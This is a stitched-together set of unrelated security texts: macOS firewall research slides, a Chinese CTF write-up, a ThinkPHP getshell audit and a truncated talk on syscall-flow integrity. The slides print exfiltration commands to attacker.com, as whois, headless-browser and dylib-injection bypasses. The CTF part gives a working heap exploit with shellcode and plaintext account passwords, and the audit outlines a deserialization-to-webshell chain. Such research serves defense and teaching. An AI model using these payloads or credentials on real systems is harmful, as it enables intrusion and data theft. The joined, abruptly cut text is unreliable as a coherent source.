digita security Fire & Ice making and breaking mac firewalls WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digita nsa nasa Outline making breaking macos firewalls socket filter } bugs bypasses } ipc, rules, alerts digita security MAKING A FIREWALL filtering network traffic The Goal to monitor all network traffic; blocking unauthorized traffic while allowing trusted (legitimate) connections we'll focus on outgoing traffic (as Apple's built-in firewall is sufficient for incoming) C&C server malware infects system malware attempts to connect to C&C server or exfil data firewall detects unauthorized connection, alerting user } generically no a priori knowledge LuLu github.com/objective-see/LuLu Network Kernel Extensions & socket filters "Network kernel extensions (NKEs) provide a way to extend and modify the networking infrastructure of OS X" -developer.apple.com Apple's Network Kernel Extensions Programming Guide Socket Filter (NKE) "filter inbound or outbound traffic on a socket" -developer.apple.com socket operation allowed kernel mode Registering a Socket Filter the sflt_filter structure "A socket filter is registered by [first] filling out desired callbacks in the sflt_filter structure." OS X and iOS Kernel Programming struct sflt_filter { sflt_handle sf_handle; int sf_flags; char *sf_name; sf_unregistered_func sf_unregistered; sf_attach_func sf_attach; sf_detach_func sf_detach; sf_notify_func sf_notify; sf_getpeername_func sf_getpeername; sf_getsockname_func sf_getsockname; sf_data_in_func sf_data_in; sf_data_out_func sf_data_out; sf_connect_in_func sf_connect_in; sf_connect_out_func sf_connect_out; sf_bind_func sf_bind; sf_setoption_func sf_setoption; sf_getoption_func sf_getoption; .... struct sflt_filter (kpi_socketfilter.h) int sf_flags: set to SFLT_GLOBAL }callbacks (optional) attach data in/out detach Registering a Socket Filter the sflt_register function extern errno_t sflt_register(const struct sflt_filter *filter, int domain, int type, int protocol); //register socket filter // AF_INET domain, SOCK_STREAM type, TCP protocol sflt_register(&tcpFilterIPV4, AF_INET, SOCK_STREAM, IPPROTO_TCP) socket operation invoke sflt_register() for each domain, type, and protocol AF_INET/SOCK_STREAM/TCP AF_INET/SOCK_DGRAM/UDP AF_INET6/SOCK_STREAM/TCP etc... registering a socker filter Socket Filter Callbacks sf_attach_func: new sockets //callback for new sockets static kern_return_t attach(void **cookie, socket_t so); "The attach function...[is] called whenever [the] filter attaches itself to a socket. This happens...when the socket is created." OS X and iOS Kernel Programming the socket per socket data static kern_return_t attach(void **cookie, socket_t so){ //alloc cookie *cookie = (void*)OSMalloc(sizeof(struct cookieStruct), allocTag); //save rule action // values: allow/deny/ask ((struct cookieStruct*)(*cookie))->action = queryRule(proc_selfpid()); LuLu's attach function Socket Filter Callbacks sf_connect_out_func: outgoing connections //callback for outgoing (TCP) connections static kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to) "sf_connect_out_func is called to filter outbound connections. A protocol will call this before initiating an outbound connection." kpi_socketfilter.h the (attached) socket per socket data kern_return_t connect_out(void *cookie, socket_t so, const struct sockaddr *to){ //rule says 'allow'?
 if(RULE_STATE_ALLOW == cookie->ruleAction) return kIOReturnSuccess; //rule says 'block'? if(RULE_STATE_BLOCK == cookie->ruleAction) return kIOReturnError; //unknown (new) process.. LuLu's connect_out function remote address Callback: sf_connect_out_func handling an unknown process //nap time! IOLockSleep(ruleEventLock, &ruleEventLock, THREAD_ABORTSAFE); put thread to sleep sf_connect_out_func invoked on the thread of process connecting out! report event to user-mode daemon via shared queue //data queue IOSharedDataQueue *sharedDataQueue = NULL; //shared memory IOMemoryDescriptor *sharedMemoryDescriptor = NULL;
 //get memory descriptor // used in `clientMemoryForType` method sharedMemoryDescriptor = sharedDataQueue->getMemoryDescriptor(); ... //queue it up sharedDataQueue->enqueue_tail(&event, sizeof(firewallEvent)); lulu (user-mode) Callback: sf_connect_out_func handling an unknown process daemon daemon, passes event to login item via XPC login item //process alert request from client // blocks for queue item, then sends to client -(void)alertRequest:(void (^)(NSDictionary* alert))reply { //read off queue self.dequeuedAlert = [eventQueue dequeue]; //return alert reply(self.dequeuedAlert); return; } login item displays alert ...& awaits for user's response allow deny! <process> is trying to connect to <addr> alert Callback: sf_connect_out_func handling an unknown process " " user's response passed back to daemon (XPC) daemon save to rule database "allow" || "block" } kext send to kext (iokit) awake thread & apply response Process Classification known? unknown? socket operation //get process pid_t process = proc_selfpid(); socket filter callback(s), are invoked in context of process that initiated socket operation lulu (user-mode) generate code signing info (or hash) of process query rules database known process? tell kernel block/allow } unknown process? alert user/get response LuLu the free macOS firewall github.com/objective-see/LuLu full src code: rule's window alert installer digita security BREAKING FIREWALLS exploiting & bypassing The Goal access the network (e.g. connect out to a malicious C&C server or exfiltrate data) without being blocked by a firewall. C&C server infected host firewall 'aware' malware firewall (security) flaws firewall bypasses } product specific generic Firewall 'Aware' Malware is a firewall detected? yah; then gtfo "They were finally caught while attempting to upload a screenshot to one of their own servers, according to the report. A piece of security software called Little Snitch ... was installed on one of the information security employees’ laptops [at Palantir], and it flagged the suspicious upload attempt" -buzzfeed $ cat Twitter1 if [ -e /System/Library/Extensions/LittleSnitch.kext ] then cd "$DIR" ./Twitterrific exit 0 fi ... OSX.DevilRobber LittleSnitch (firewall) installed? ...yes; skip infecting the system! red team: caught! Firewall Vulnerabilities little snitch ring-0 heap overflow (wardle/cve-2016-8661) 32bit void* OSMalloc( uint32_t size ...); int copyin(..., vm_size_t nbytes ); offset 15 ... 8 7 6 5 4 3 2 1 0 value 1 0 0 0 0 0 0 0 2 64bit 64bit value: 0x100000002 32bit value: 0x100000002 vs. kernel4heap heap4buffer4
 [size:424bytes] rest4of4heap.... heap4buffer4
 [size:424bytes] rest4of4heap.... 0x41 0x41 0x4140x4140x4140x414 0x4140x4140x4140x41 vm_size_t 
 is 64bits! kernel heap sub_FFFFFF7FA13EABB2 proc mov rbx, rsi mov rdi, [rbx+30h] ; user-mode struct mov rbx, rdi mov rdi, [rbx+8] ; size ... mov rsi, cs:allocTag call _OSMalloc ; malloc ... mov rdi, [rbx] ; in buffer mov rdx, [rbx+8] ; size mov rsi, rax ; out buffer (just alloc'd) call _copyin Firewall Vulnerabilities little snitch installer/updater local EoP (versions < 4.1) (lldb) po $rdx { /bin/rm -Rf "$DESTINATION" && /bin/cp -Rp "$SOURCE" "$DESTINATION" && /usr/sbin/chown -R root:wheel "$DESTINATION" && /bin/chmod -R a+rX,og-w "$DESTINATION"; } 2>&1 (lldb) po [[NSProcessInfo processInfo] environment] ... DESTINATION = "/Library/Little Snitch/Little Snitch Daemon.bundle"; SOURCE = "/Volumes/Little Snitch 4.0.6/Little Snitch Installer.app/Contents/Resources/ Little Snitch Daemon.bundle"; .dmg cp pkg/.../Little Snitch Daemon.bundle /Library/Little Snitch/ chown -R root:wheel 
 /Library/Little Snitch/ little snitch installer logic #_ Bypassing RadioSilence ...don't trust a name! "The easiest network monitor and firewall for Mac...Radio Silence can stop any app from making network connections" -radiosilenceapp.com com.radiosilenceapp.nke.filter int _is_process_blacklisted(int arg0, int arg1) { return _is_process_or_ancestor_listed(r14, 0x0); } int _is_process_or_ancestor_listed(int arg0, int arg1) { //'launchd' can't be blacklisted _proc_name(arg0, &processName, 0x11); rax = _strncmp("launchd", &processName, 0x10); if (rax == 0x0) goto leave; ... return rax; } blacklist'ing check Bypassing RadioSilence ...don't trust a name! $ ~/Desktop/launchd google.com <HTML><BODY> <H1>301 Moved</H1> The document has moved <A HREF="http://www.google.com/">here</A>. </BODY></HTML> bypass: name malware: 'launchd' blacklist malware ...still connects out! Bypassing HandsOff ...don't trust a click! "Keep an eye on Internet connections from all applications as to expose the hidden connections. Prevent them from sending data without your consent" -handsoff $ curl google.com Allow " " void bypass(float X, float Y){
 //clicky clicky CGPostMouseEvent(CGPointMake(X, Y), true, 1, true); CGPostMouseEvent(CGPointMake(X, Y), true, 1, false); } synthetic click <HTML><HEAD> <TITLE>301 Moved</TITLE> Bypassing LuLu ...don't trust a system utility! "the free macOS firewall that aims to block unauthorized (outgoing) network traffic" -lulu //apple utils // may be abused, so trigger an alert NSString* const GRAYLISTED_BINARIES[] = { @"com.apple.nc", @"com.apple.curl", @"com.apple.ruby", @"com.apple.perl", @"com.apple.perl5", @"com.apple.python", @"com.apple.python2", @"com.apple.pythonw", @"com.apple.openssh", @"com.apple.osascript" }; is there an(other) system utility that we can abuse? LuLu's 'graylist' Bypassing LuLu ...don't trust a system utility! $ echo "exfil this data" > exfil.txt $ RHOST=attacker.com $ RPORT=12345 $ LFILE=file_to_send $ whois -h $RHOST -p $RPORT "`cat $LFILE`" LuLu(105): 
 due to preferences, allowing apple process: /usr/bin/whois LuLu(105): adding rule for /usr/bin/whois
 ({ signedByApple = 1; signingIdentifier = "com.apple.whois"; }): action: ALLOW exfil via 'whois' via @info_dox LuLu (debug) log ...traffic (silently) allowed Bypassing LittleSnitch ...don't trust a domain! $ curl https://setup.icloud.com/setup/ws/1/login {"success":false,"error":"Invalid ... header"} curl little snitch (kext) *.icloud.com Bypassing LittleSnitch ...don't trust a domain! $ python iCloud.py upload ~/Desktop/topSecret.txt [1] login: https://setup.icloud.com/setup/ws/1/login params: {'clientBuildNumber': '15A99', 'clientId': '12A9D426-C45B-11E4-BA3B-B8E8563151B4'}
 [2] init'ing upload: https://p34-docws.icloud.com/ws/com.apple.CloudDocs/upload/web params: {'token': 'AQAAAABU-jxwYG7i1C7BBsuqtqfsa74Rb_2u6yI~"'} data: {"size": 6, "type": "FILE", "content_type": "text/plain", "filename": "topSecret.txt"}
 response: [{u'url': u'https://p34-contentws.icloud.com:443/8205919168/singleFileUpload? tk=BRC9cJWSP7a4AxOYKf8K&ref=01003e53bebaf26c7c47a33486f7776a26f60568a6&c=com.apple.clouddocs &z=com.apple.CloudDocs&uuid=3f678124-94d4-4fa0-9f1f-6d24dbc49f17&e=AvKdu5MfcUeIfLPJ6MeWTV6dS EBoN3BPTCwGHjqSF8jVCEfsXhKglXKR58YkzILGWw', u'owner': u'8205919168', u'document_id': u'BF38917E-DD30-44A9-8E34-32ABB7800899', u'owner_id': u'_ee6a3e4219e1fb22e1d9d0690b7366b6'}]
 [3] uploading to: https://p34-contentws.icloud.com:443/8205919168/singleFileUpload? tk=BRC9cJWSP7a4AxOYKf8K&ref=01003e53bebaf26c7c47a33486f7776a26f60568a6&c=com.apple.clouddocs &z=com.apple.CloudDocs&uuid=3f678124-94d4-4fa0-9f1f-6d24dbc49f17&e=AvKdu5MfcUeIfLPJ6MeWTV6dS EBoN3BPTCwGHjqSF8jVCEfsXhKglXKR58YkzILGWw response: {u'singleFile': {u'referenceChecksum': u'AQA+U7668mx8R6M0hvd3aib2BWim', u'wrappingKey': u'3gtDUoGIjmFloUFCTFvLCQ==', u'receipt': u'A0/B7PXdJi5JC5Ep', u'size': 6, u'fileChecksum': u'Abv+EeVEGAQ0o5/2szwFFOVX1ICw'}} [4] committing upload: https://p34-docws.icloud.com/ws/com.apple.CloudDocs/update/documents exfil to iCloud C&C Generic Bypasses regardless of firewall product: connect out goal: access the network (e.g. connect to a malicious C&C server or exfiltrate data) without being blocked by (any) firewall. firewalls are inherently disadvantaged ...must allow certain network traffic! system functionality (dns, os updates, etc.) 'usability' (browsers, chat clients, etc.) } passively determine what's allowed abuse these trusted protocols/processes to generically bypass any installed firewall Generic Bypasses what traffic is allowed? $ lsof -i TCP -sTCP:ESTABLISHED Google Chrome patricks-mbp.lan:58107->ec2-107-21-125-119.compute-1.amazonaws.com:https Signal patricks-mbp.lan:58098->ec2-52-2-222-12.compute-1.amazonaws.com:https Slack patricks-mbp.lan:58071-> VMware patricks-mbp.lan:62676->a23-55-114-98.deploy.static.akamaitechnologies.com:https com.apple.WebKit.Networking (Safari) patricks-mbp.lan:58189->a23-55-116-179.deploy.static.akamaitechnologies.com:https Core Sync.app patricks-mbp.lan:58195->ec2-52-5-250-175.compute-1.amazonaws.com:https Creative Cloud.app patricks-mbp.lan:57194->ec2-52-2-42-38.compute-1.amazonaws.com:https GitHub patricks-mbp.lan:58119->lb-192-30-255-116-sea.github.com:https } lsof output (user processes) what's allowed!? Abusing DNS connect to 'evil.com' XPC resolve 'evil.com' mdnsresponder allowed dns server firewall examines request dns server resolves request macOS 
 domain name resolution handled by mdnsresponder fully trusted by firewalls Abusing DNS int main(int argc, const char * argv[]) { struct addrinfo *result = {0}; //'resolve' DNS // this is routed to mDNSResponder getaddrinfo(argv[1], NULL, NULL, &result); .... resolve 'data.to.exfilatrate.evil.com' response encode tasking in A* records HandsOff (in advanced mode) tracks DNS resolutions, but NOT "DNS Service Discovery" (DNS-SD, see: /usr/include/dns_sd.h) Abusing Browsers synthetic browsing via AppleScript "A browser that is not afforded indiscriminate network access (at least to remote web severs) is rather useless" tell application "Safari" run tell application "Finder" to set visible of process "Safari" to false make new document
 set the URL of document 1 to "http://attacker.com?data=data%20to%20exfil" 
 end tell invisible exfil data Abusing Browsers synthetic browsing via cmdline interfaces $ "Google Chrome" 
 --headless http://attacker.com?data=data%20to%20exfil $ firefox-bin 
 --headless http://attacker.com?data=data%20to%20exfil $ open -j -a Safari 
 http://attacker.com?data=data%20to%20exfil //what's user's default browser? CFURLRef http = CFURLCreateWithString(NULL, CFSTR("http://"), NULL); CFURLRef browser = LSCopyDefaultApplicationURLForURL(http, kLSRolesAll, nil); determine default browser Abusing Code/Dylib Injections any code in a trusted process, is trusted any code running in the context of process trusted ('allowed') by a firewall, will inherit that same trust! injection methods of injection: write to remote memory malicious plugins dylib proxying environment variables targets: 3rd-party apps Abusing Code/Dylib Injections writing to remote memory //get task ports via 'processor_set_tasks' processor_set_default(myhost, &psDefault); host_processor_set_priv(myhost, psDefault, &psDefault_control); processor_set_tasks(psDefault_control, &tasks, &numTasks); //find process's task port // then (as a poc) remotely allocate some memory for(i = 0; i < numTasks; i++) { pid_for_task(tasks[i], &pid); if (pid == targetPID) { mach_vm_address_t remoteMem = NULL; mach_vm_allocate(tasks[i], &remoteMem, 
 1024, VM_FLAGS_ANYWHERE); //now write & exec injected shellcode "Who needs task_for_pid() anyway..." -(j. levin) # ps aux | grep Slack patrick 36308 /Applications/Slack.app
 # lsof -p 36308 | grep TCP Slack TCP patricks-mbp.lan:57408 -> ec2-52-89-46.us-west-2.compute.amazonaws.com # ./getTaskPort -p 36308 getting task port for Slack (pid: 36308) got task: 0xa703 allocated remote memory @0x109b4e000 ... 'traditional' injection Abusing Code/Dylib Injections environment variable (DYLD_INSERT_LIBRARIES) $ DYLD_INSERT_LIBRARIES=/tmp/bypass.dylib /Applications/Slack.app/Contents/MacOS/Slack //custom constructor __attribute__((constructor)) static void initializer(void) { NSURL *url = [NSURL URLWithString: @"http://www.attacker.com/?data=data%20to%20exfil%20via%20Slack"]; NSData *data = [NSData dataWithContentsOfURL:url]; } malicious dylib target (trusted) application dylib w/ custom constructor user agent: 'Slack' Abusing Code/Dylib Injections dylib proxying LC_LOAD_DYLIB: /Applications/<some app>/<some>.dylib note, due to System Integrity Protection (SIP) one cannot replace/proxy system dynamic libraries. LC_LOAD_DYLIB: /Applications/<some app>/<some>.dylib Abusing Code/Dylib Injections dylib proxying in two easy steps copy original dylib replace original dylib -Xlinker -reexport_library <path to legit dylib> re-export symbols! $ install_name_tool -change <existing value of LC_REEXPORT_DYLIB> <new value for to LC_REEXPORT_DYLIB (e.g target dylib)> <path to dylib to update> Kernel-based Bypasses in ring-0, no one can stop you! static kern_return_t attach( ... ) { ... //don't mess w/ kernel sockets if(0 == proc_selfpid()) { //allow result = kIOReturnSuccess; goto bail; } traffic from the kernel is generally (allowed) trusted allowing kernel traffic (LuLu) Kernel-based Bypasses in ring-0, no one can stop you! kernel mode "Different possibilities exist to hide our network connections from Little Snitch and also Apple's application firewall. The easiest one is to patch or hook the sf_attach callback." -fG! (@osxreverser) patch callbacks remove callbacks Kernel-based Bypasses ok, how do we get into the kernel? get root 'bring' & load buggy kext exploit to run unsigned kernel code (buggy) kext still validly signed! code loaded into the kernel (i.e. kexts) must be signed...and Apple rarely hands out kext signing certs! SlingShot APT (Windows) Kernel-based Bypasses ok, how do we get into the kernel? "macOS High Sierra 10.13 introduces a new feature that requires user approval before loading new third-party kernel extensions." -apple " " fixed? bypass with synthetic event [0day] "The Mouse is Mightier than the Sword" (DefCon, Sunday 10AM) Apple: yes, 100% fixed Patrick: nope, it's not!! digita security CONCLUSION wrapping this up macOS Firewalls kernel socket filter } bugs bypasses firewalls are not enough! use other host-based security products use network-based security products making: breaking: ...ok, one more last thing! "Objective by the Sea" conference ObjectiveByTheSea.com Maui, Hawaii Nov 3rd/4th All things macOS malware bugs security Free for Objective-See patrons! Finale @patrickwardle patrick@digitasecurity.com cybersecurity solutions for the macOS enterprise digita security Credits - iconexperience.com - wirdou.com/2012/02/04/is-that-bad-doctor - http://pre04.deviantart.net/2aa3/th/pre/f/ 2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg
 - opensource.apple.com - newosxbook.com (*OS Internals) - github.com/objective-see/LuLu - apress.com/gp/book/9781430235361 - phrack.org/issues/69/7.html
 images resources
深育杯 WriteUp By Nu1L 深育杯 WriteUp By Nu1L ianxtianxt/discuz-ml-rce: 影响系统及版本:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 (github.com) 直接rce 三次撞⻋导致vftable被free,后续可以劫持 from pwn import * context.arch = 'amd64' # s = process("./main") s = remote("","10000") def cmd(idx):    s.sendlineafter("> ",str(idx)) cmd(1) def add(size,name,num,rode,dir,speed):    cmd(1)    s.sendlineafter("Name length: ",str(size))    s.sendlineafter("Name: ",name)    s.sendlineafter("Car number: ",str(num))    s.sendlineafter("Choose a rode(0 to 3): ",str(rode))    s.sendlineafter("Choose a direction(1 for forward or 2 for backward): ",str(dir))    s.sendlineafter("Set car's speed: ",str(speed)) def run():    cmd(4) add(0x10,'123',0,0,2,30) add(0x10,'123',1,0,1,30) add(0x10,'123',1,0,1,30) add(0x10,'123',0,0,2,30) # add(0x10,'123',2,0,1,30) # add(0x10,'123',3,0,2,30) run() elf = ELF("./main") payload = p64(0x4050E0)*2 payload += p64(0)*2 payload += p64(elf.sym['back_door'])+p64(elf.sym['puts']) add(0x50,payload[:0x4f],1,0,1,30) cmd(3) s.sendlineafter("Car index: ","0") cmd(2) heap = u64(s.recvline(keepends=False).ljust(8,'\x00')) success(hex(heap)) cmd(3) s.sendlineafter("Car index: ","0") cmd(1) sc = asm(shellcraft.sh()) s.sendafter("Door",'deadbeefdeadbeef') cmd(2) s.sendlineafter("Car index: ","0") cmd(5) cmd(1) add(0x10,'123',0,0,2,30) add(0x10,'123',1,0,1,30) add(0x10,'123',1,0,1,30) add(0x10,'123',0,0,2,30) # add(0x10,'123',2,0,1,30) # add(0x10,'123',3,0,2,30) run() sc = "\x48\x31\xf6\x56\x48\xbf" sc += "\x2f\x62\x69\x6e\x2f" sc +=  "\x2f\x73\x68\x57\x54" sc +=  "\x5fH\xc7\xc0;\x00\x00\x00\x99\x0f\x05" payload = p64(0x4050E0)*2 payload += p64(0)*2 payload += p64(heap+0x3f8)+sc add(0x50,payload[:0x4f],1,0,1,30) success(hex(heap)) # gdb.attach(s,'b *0x4022f5\nc') cmd(3) s.sendlineafter("Car index: ","0") 80端⼝有备份 cmd(1) s.sendline("echo 123123123") s.recvuntil("123123123") s.sendline("cat test.b64") b64 = s.recvall(timeout=5) open("test.b64","w").write(b64) s.interactive() import base64 from ctypes import * from pwn import * data = open("./breakpwd.txt","r").read() string1 = "ABCDEFGHIJKLMNOPQR0123456789stuvwxyzabcdefghijklmnopqrSTUVWXYZ+/=" string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" data = base64.b64decode(data.translate(str.maketrans(string1,string2))) def decrypt(v, k):    v0, v1 = c_uint32(v[0]), c_uint32(v[1])    delta = 0x9e3779b9    k0, k1, k2, k3 = k[0], k[1], k[2], k[3]    total = c_uint32(delta * 32)    for i in range(32):                              v1.value -= ((v0.value<<4) + k2) ^ (v0.value + total.value) ^ ((v0.value>>5) + k3)        v0.value -= ((v1.value<<4) + k0) ^ (v1.value + total.value) ^ ((v1.value>>5) + k1)          total.value -= delta    return v0.value, v1.value   v = [] key = [0x14,0,0xc,0x19] data = data+b'\x00'*6 for i in range(0,len(data),4):    tmp = u32(data[i:i+4])    v.append(tmp) vs = [] for i in range(0,len(v),2):    vs.append((v[i],v[i+1])) 账号:admin 密码:8ab126bd5a 下⾯有弱⼝令top1000 xiaocheng@goldsun.com xiaocheng@991678 wget可以发⽂件,⽤监听就可以了 ewomail 账号: xiaocheng@goldsun.com xiaocheng@991678 arun@goldsun.com arun@970614 劫持exe上线即可 xiaocheng密码爆破 Xiaocheng960811 buf = b'' for i in vs:    t1,t2 = decrypt(i,key)    buf += p32(t1)    buf += p32(t2)    # break print(buf[:420]) file&argv=/flag&argv= 从邮箱⾥拿到密码 是个差分隐私的题⽬,这种基于laplace噪声的可以通过求平均的⽅法消除部分噪声的影响,⽽且看这个形式应该也 是个shamir⻔限制度,⽤拉格朗⽇插值的⽅法可以恢复多项式,恢复之后对多项式求平均。但求完平均之后还是会 有噪声影响,不过这个噪声已经很⼩了,只会对字符ascii码产⽣较⼩的影响,在+-2的范围内看⼀下语义,结合差 分隐私(DifferentialPrivacy)的题⼲即可猜出flag。 挂个正向代理⽤永恒之蓝直接打就⾏,然后mimikatz dump wangling密码即可 from sage.all import * import numpy as np from Crypto.Util.number import * def h(xs,ys,a):    ans=0    for i in range(len(ys)):        t=ys[i]        for j in range(len(ys)):            if i != j:                t*=(a-xs[j])/(xs[i]-xs[j])        ans +=t    return ans R.<x> = QQ[] xs = [1,3,4,5,7,9,13] for k in range(1, 5):    fs = []    for i in range(1, 21):        ys = []        with open(f'../part{k}/{i}.txt', 'r') as f:            data = f.readlines()[1:]            data = [t.strip().split(',') for t in data]            for j in range(len(data)):                pair = data[j]                idx = pair[0]                if int(idx) in xs:                    ys.append(float(pair[1]))            fs.append(h(xs, ys, x))    f = sum(fs)    f = f / 20    need = [1,2,3,6,7,9,14]    flag = ''    for i in need:        flag += chr(int(f(i)))        # flag += chr(int(f(i)+0.5))    print(flag, end='')
​ ddi/server/login.php - 0x00 0x01 CLI ​ ​ ​ conf t //config webmaster level 0 username admin password 123123 // show webmaster users // ​ $res = execCli("exec", "webmaster $username $password"); if ($res["status"] != 1) { json_echo($res); exit(); } $isSuccess = trim($res["data"]); if ($isSuccess == 0) { // session_start(); $isSuccess = trim($res["data"]); if ($isSuccess == 0) { // ​ 0x02 username=admin&password=a+b+c+d+e+f ddi/server/fileupload.php ​ 0x03 0x03
hw 0x01 ​ userid=1|roleid=1 0x02 0x03 this.UserID = CommonFunction.DESDec(this.UserID); this.RoleID = CommonFunction.DESDec(this.RoleID); UserID=Uhe4q0dwPJk= 34dc0AHJKqA= 0x04
日常审计任务,记录一下 审计 某套短视频点赞诈骗平台的GetShell组合拳(TP3反序列化实战) ​ 打开看到源码,很明显就是ThinkPHP v3.2.x的目录结构。 ​ 查看框架入口文件里的 THINK_VERSION 发现是3.2.3版本。 一些旧的框架版本的注入也都被修复了,寻找注入无果,于是开始其他漏洞的挖掘。 任意Session操作 文件: /Application/Api/Controller/AlipayController.class.php ​ 这里的 session() 是ThinkPHP提供的,功能是可以操作session。 那么这里的利用思路就很清晰了,利用seesion操作,模拟管理员的session进行后台登陆。 接着去看了一下后台控制器的基类 文件: /Application/Common/Controller/AdminBaseController.class.php ​ 这里可以看到,Admin的基类对权限的控制使用的是ThinkPHP封装好的验证类。跟进去看了一下,非常复杂,网上也没看到分析文章,实在 不想继续分析,于是往下走了点弯路。 由于前台用户是需要注册的,而注册又是需要邀请码的,在没有邀请码的情况下,是没有办法注册的,也就没办法调用前台的一些功能点, 对审计工作造成了局限性。但是这里有一个Session操作的漏洞就不一样了,我们可以通过操作Session登陆一个前台账号。 前台用户控制器的基类: 文件: /Application/Common/Controller/HomeBaseController.class.php ​ ​ 基本就是通过 $this->is_login() 来判断是否登陆 ​ ​ 可以看到,只要 $_SESSION['member']['id']>0 即可。 这时候我们就可以使用前台的所有功能点了。 Phar反序列化 就在前两天我在团队的公众号公开了一条 ThinkPHP v3.2.* 的一条pop链(ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链),当前审 计的源码的框架版本,正好也在版本中,于是开始尝试挖掘反序列化。 经过一轮全局搜索 unserialize( 无果后,我开始尝试使用Phar反序列化, 全局搜索 (fileatime|filectime|file_exists|file_get_contents|file_put_contents|file|filegroup|fopen|fileinode|filemtime|fileowner|file perms|is_dir|is_executable|is_file|is_link|is_readable|is_writable|is_writeable|parse_ini_file|copy|unlink|stat|readfile)\(( .*?)\$(.*?)\) 寻找可控协议的文件操作函数。 文件: /Application/Home/Controller/QrcodeController.class.php ​ 可以看到这里有一个 file_get_contents() 函数,里面的参数是我们完全可控的,所以这里是可以触发phar反序列化的。 本地搭建一下环境测试 ​ 生成测试用的phar文件 ​ 触发Phar反序列化 ​ ​ 成功,通过反序列化就可以读取目标的数据库配置文件,然后通过数据库操作进行添加用户或者读取密码等操作,最终进入后台。 后台GetShell 现在进入后台了,可以审计的点就又多了。首先先查看上传的代码。 把所有的上传逻辑都看完了,但是都做了白名单,无法进行绕过,所以开始寻找其他可GetShell的点。 文件: /Application/Admin/Controller/SystemConfigController.class.php ​ 这里调用了 SystemConfigModel::set ,跟过去看看。 ​ 发现调用的是ThinkPHP的 F() 函数,熟悉ThinkPHP的师傅们应该知道,这个函数是用来缓存一些数据的,如字符串、数组等。而缓存的方式是将数据序列化后存入 一个PHP文件中,所以我们可以使序列化后的字符串存在一个php后门,完成GetShell。 利用 经过审计后,一整套的组合拳就出来了。 1. 通过操作Session登陆任意前台用户 ​ 2. 通过报错界面获取WEB路径 ​ 3. 生成利用恶意Mysql客户端任意文件读取漏洞获取数据库配置文件的phar文件 ​ 4. 上传phar文件到服务器 ​ 5. 触发反序列化读取数据库配置文件 ​ ​ 6. 生成与目标数据库服务器配置相同配置的phar文件,并上传 ​ ​ 7. 触发反序列化进行SQL注入 ​ 8. 读取后台账号密码并解密,或者插入一条后台管理员账号 ​ 9. 登陆后台使用漏洞GetShell ​ 最后 这篇其实就是前两天发的TP3反序列化利用链的实战篇,实战打起来其实也不算繁琐,但是现在PHP的反序列化越来越少了,所以这种洞还是 且挖且珍惜吧。
Go With the Flow Enforcing Program Behavior Through Syscall Sequences and Origins Claudio Canella (@cc0x1f) August 11, 2022 Graz University of Technology Who am I? Claudio Canella PhD Candidate @ Graz University of Technology @cc0x1f claudio.canella@iaik.tugraz.at 1 Claudio Canella (@cc0x1f) 2002 2004 2006 2008 2010 2012 2014 2016 2018 2020 2022 0 0.5 1 1.5 2 ·104 2,1561,527 2,451 4,935 6,6106,520 5,6325,736 4,6534,155 5,2975,191 7,939 6,5046,454 14,714 16,55717,344 18,325 20,149 15,044 Year Vulnerabilities1 1Source: http://www.cvedetails.com/vulnerabilities-by-types.php 2 Claudio Canella (@cc0x1f) What to do? Eliminate bugs 3 Claudio Canella (@cc0x1f) What to do? Eliminate bugs Limit Post-Exploitation Impact 3 Claudio Canella (@cc0x1f) What to do? Eliminate bugs Limit Post-Exploitation Impact 3 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 control flow 4 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 Allow: 3 → [5,6] Deny: 3 → ![5,6] control flow CFI check 4 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 Allow: 3 → [5,6] Deny: 3 → ![5,6] control flow CFI check malicious flow 4 Claudio Canella (@cc0x1f) Control-Flow Integrity 1 2 3 4 5 6 Allow: 3 → [5,6] Deny: 3 → ![5,6] control flow CFI check malicious flow 4 Claudio Canella (@cc0x1f) Linux Seccomp Kernel App. 5 Claudio Canella (@cc0x1f) Linux Seccomp Kernel App. Filter install 5 Claudio Canella (@cc0x1f) Linux Seccomp Kernel App. Filter System Call 5 Claudio Canella (@cc0x1f) Linux Seccomp no Kernel App. Filter terminate System Call 5 Claudio Canella (@cc0x1f) Linux Seccomp no Kernel App. Filter terminate System Call System Call 5 Claudio Canella (@cc0x1f) Linux Seccomp no Kernel App. Filter terminate System Call System Call return 5 Claudio Canella (@cc0x1f) Sample 6 Claudio Canella (@cc0x1f) Sample Syscalls: 0 1 2 3 16 19 20 60 72 202 231 6 Claudio Canella (@cc0x1f) Syscall-Flow-Integrity Protection 7 Claudio Canella (@cc0x1f) Syscall-Flow-Integrity Protection State Machine 7 Claudio Canella (@cc0x1f) Syscall-Flow-Integrity Protection State Machine Origins 7 Claudio Canella (@cc0x1f) Syscall-Flow-Integrity Protection State Machine Origins Enforcement 7 Claudio Canella (@cc0x1f) Syscall-Flow-Integrity Protection State Machine Origins Enforcement SFIP 7 Claudio Canella (@cc0x1f) SysFlow Compiler: Extraction 8 Claudio Canella (@cc0x1f) SysFlow Compiler: Extraction Library: Setup 8 Claudio Canella (@cc0x1f) SysFlow Compiler: Extraction Library: Setup Kernel: Enforcement 8 Claudio Canella (@cc0x1f) Syscall and CFG Extraction Source Code L01 : void foo ( i n t t e s t ) { L02 : s c an f ( . . . ) ; L03 : i f ( t e s t ) L04 : p r i n t f ( . . . ) L05 : e l s e L06 : s y s c a l l ( read , . . . ) ; L07 : i n t r e t = bar ( . . . ) ; L08 : i f ( ! r e t ) L09 : e x i t (0) ; L10 : return r e t ; L11 : } 9 Claudio Canella (@cc0x1f) Syscall and CFG Extraction Source Code L01 : void foo ( i n t t e s t ) { L02 : s c an f ( . . . ) ; L03 : i f ( t e s t ) L04 : p r i n t f ( . . . ) L05 : e l s e L06 : s y s c a l l ( read , . . . ) ; L07 : i n t r e t = bar ( . . . ) ; L08 : i f ( ! r e t ) L09 : e x i t (0) ; L10 : return r e t ; L11 : } Extracted Function Info { ” T r a n s i t i o n s ” : { ”L03” : [ L04 , L06 ] , ”L04” : [ L07 ] , ”L06” : [ L07 ] ”L08” : [ L09 , L10 ] } ” C a l l Targets 